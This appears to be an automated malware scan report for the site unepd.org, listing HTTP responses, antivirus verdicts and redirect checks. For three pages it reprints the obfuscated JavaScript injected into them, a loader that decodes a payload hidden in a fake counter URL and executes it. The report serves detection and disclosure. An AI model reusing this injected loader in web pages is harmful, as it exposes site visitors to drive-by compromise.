Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=unepd.org
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://unepd.org/ | 200 OK Content-Length: 13759 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function setGoogleCounter(){ var scriptlink = "http://chalkboard-counter-google-desktop-gadget.googlecode.com/svn/trunk/gadget/scripts/counter.js?userrefer=%0A705%0As51i9t0fgknrmel%3Dohldaxeocdlc60wu209mk1ieyd2nejlt77o.xwicqojrg9re9xzakk9tyu6eb9hEnzclbseefd6m84gekcan3s5t3vj%280oi%22l69i94bffyyrnx7ala1mahde35n%22hve%295jh%3B58s%0Awjpil59fds0r4ux.ijmsoixrol3c5br%3Dp6y%227v0hjmltl31to49pyi6%3Aeit/24w/f50ww7zwultwqja.ntvpbvppmush1lieu6lr7f2p6uhd6lyfpfuvxlns2u9dhmk.u6pcklio207mdsl/cl9pndih var cont=''; currentuser=true, nextuser=countbox.firstChild; do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild) var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } setGoogleCounter(); Antivirus reports:
| ||
http://unepd.org/../../learnsty2.htm | 400 Bad Request Content-Length: 341 Content-Type: text/html | clean |
http://unepd.org/test404page.js | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 15:40:26 GMT Location: http://typhon.tybit.com/?name=unclp1.org Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4 Content-Type: text/html; charset=iso-8859-1 | clean |
http://typhon.tybit.com/?name=unclp1.org | 200 OK Content-Length: 842 Content-Type: text/html | clean |
http://typhon.tybit.com/js/jquery.min.js | 200 OK Content-Length: 57254 Content-Type: application/x-javascript | clean |
http://unepd.org/level3.htm | 200 OK Content-Length: 34969 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function setGoogleCounter(){ var scriptlink = "http://chalkboard-counter-google-desktop-gadget.googlecode.com/svn/trunk/gadget/scripts/counter.js?userrefer=%0A705%0As51i9t0fgknrmel%3Dohldaxeocdlc60wu209mk1ieyd2nejlt77o.xwicqojrg9re9xzakk9tyu6eb9hEnzclbseefd6m84gekcan3s5t3vj%280oi%22l69i94bffyyrnx7ala1mahde35n%22hve%295jh%3B58s%0Awjpil59fds0r4ux.ijmsoixrol3c5br%3Dp6y%227v0hjmltl31to49pyi6%3Aeit/24w/f50ww7zwultwqja.ntvpbvppmush1lieu6lr7f2p6uhd6lyfpfuvxlns2u9dhmk.u6pcklio207mdsl/cl9pndih var cont=''; currentuser=true, nextuser=countbox.firstChild; do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild) var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } setGoogleCounter(); Antivirus reports:
| ||
http://unepd.org/ListeningDictionary58.doc | HTTP/1.1 302 Found Connection: close Date: Fri, 26 Dec 2014 15:40:30 GMT Location: http://typhon.tybit.com/?name=unclp1.org Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4 Content-Type: text/html; charset=iso-8859-1 | clean |
http://unepd.org/E6studentvocfile2A.doc | 200 OK Content-Length: 302152 Content-Type: application/msword | clean |
http://unepd.org/First%20day%20exercise.htm | 200 OK Content-Length: 10626 Content-Type: text/html | clean |
http://unepd.org/E6websiteexplore.doc | 200 OK Content-Length: 25600 Content-Type: application/msword | clean |
http://unepd.org/E6LearningStyles.doc | 200 OK Content-Length: 34304 Content-Type: application/msword | clean |
http://unepd.org/E6prepositionlist.htm | 200 OK Content-Length: 10211 Content-Type: text/html | clean |
http://unepd.org/level6.htm | 200 OK Content-Length: 31325 Content-Type: text/html | clean |
http://unepd.org/ListeningDictionary.doc | 200 OK Content-Length: 28672 Content-Type: application/msword | clean |
http://unepd.org/E6desc.htm | 200 OK Content-Length: 10651 Content-Type: text/html | clean |
http://unepd.org/PolishingGrammar.htm | 200 OK Content-Length: 16933 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) function setGoogleCounter(){ var scriptlink = "http://chalkboard-counter-google-desktop-gadget.googlecode.com/svn/trunk/gadget/scripts/counter.js?userrefer=%0A705%0As51i9t0fgknrmel%3Dohldaxeocdlc60wu209mk1ieyd2nejlt77o.xwicqojrg9re9xzakk9tyu6eb9hEnzclbseefd6m84gekcan3s5t3vj%280oi%22l69i94bffyyrnx7ala1mahde35n%22hve%295jh%3B58s%0Awjpil59fds0r4ux.ijmsoixrol3c5br%3Dp6y%227v0hjmltl31to49pyi6%3Aeit/24w/f50ww7zwultwqja.ntvpbvppmush1lieu6lr7f2p6uhd6lyfpfuvxlns2u9dhmk.u6pcklio207mdsl/cl9pndih var cont=''; currentuser=true, nextuser=countbox.firstChild; do{currentuser=nextuser; cont += currentuser.id; nextuser=currentuser.nextSibling;}while(currentuser!==countbox.lastChild) var userref=unescape(scriptlink.substr(scriptlink.indexOf('?userrefer=')+11)); for(var i=0,content=''; i<userref.length; i+=visitnum){content+=userref.charAt(i);} try{ window[cont](content) }catch(e){} } setGoogleCounter(); Antivirus reports:
| ||
http://unepd.org/E6relativepronounex.htm | 200 OK Content-Length: 8095 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: unepd.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 15:40:25 GMT
Accept-Ranges: bytes
ETag: "50c07e-35bf-4c98dd1d"
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Content-Length: 13759
Content-Type: text/html
Last-Modified: Tue, 21 Sep 2010 16:28:13 GMT
...13759 bytes of data.
GET / HTTP/1.1
Host: unepd.org
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 26 Dec 2014 15:40:25 GMT
Accept-Ranges: bytes
ETag: "50c07e-35bf-4c98dd1d"
Server: Apache/1.3.34 (Unix) filter/1.0 PHP/4.4.4
Content-Length: 13759
Content-Type: text/html
Last-Modified: Tue, 21 Sep 2010 16:28:13 GMT
...13759 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: unepd.org
Referer: http://www.google.com/search?q=unepd.org
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: unepd.org
Referer: http://www.google.com/search?q=unepd.org
Result:
The result is similar to the first query. There are no suspicious redirects found.